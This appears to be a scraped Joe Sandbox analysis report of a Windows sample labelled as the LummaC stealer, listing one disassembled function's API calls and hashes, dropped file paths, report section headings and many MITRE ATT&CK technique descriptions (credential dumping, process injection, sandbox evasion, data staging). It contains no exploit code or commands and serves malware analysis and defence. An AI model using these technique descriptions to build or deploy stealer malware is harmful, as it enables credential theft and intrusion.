Function 004BC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 004BC213
GetLastError.KERNEL32 ref: 004BC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004BC27C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 525c3be32ea686fc157ad763c528f1b1f18705741f84c0b21665aa13aa940924
Instruction ID: e02f225a3081445f17167d9ba4d577957cf4c4eb4b65f1a983bd0a5482fcb117
Opcode Fuzzy Hash: 525c3be32ea686fc157ad763c528f1b1f18705741f84c0b21665aa13aa940924
Instruction Fuzzy Hash: 3F41C830A00206EFDB299FE5C8C4AEB7BA5AF51710F2441ABFC55972A1DB348D01DB79

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZTM2pfyhu3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZTM2pfyhu3.exe.log

C:\Users\user\AppData\Local\Temp\768400\Climb.com

C:\Users\user\AppData\Local\Temp\768400\V

C:\Users\user\AppData\Local\Temp\Alt

C:\Users\user\AppData\Local\Temp\Articles

C:\Users\user\AppData\Local\Temp\Attractions

C:\Users\user\AppData\Local\Temp\Beaches

C:\Users\user\AppData\Local\Temp\Cooked

C:\Users\user\AppData\Local\Temp\Enrolled

C:\Users\user\AppData\Local\Temp\Fingers

Windows Analysis Report
ZTM2pfyhu3.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre